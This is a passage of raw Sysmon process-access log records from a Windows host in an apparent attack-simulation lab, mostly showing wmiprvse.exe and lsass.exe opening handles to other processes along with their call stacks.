ystem32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237348Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237347Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237346Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237345Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237344Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237343Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237342Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237341Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.674{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D64-603E-7CAA-00000000AD01}11544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237340Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.674{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D64-603E-7CAA-00000000AD01}11544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237339Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237338Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237337Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237336Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237335Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237334Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237333Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237332Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237331Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.673{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237330Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.671{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237329Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.671{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 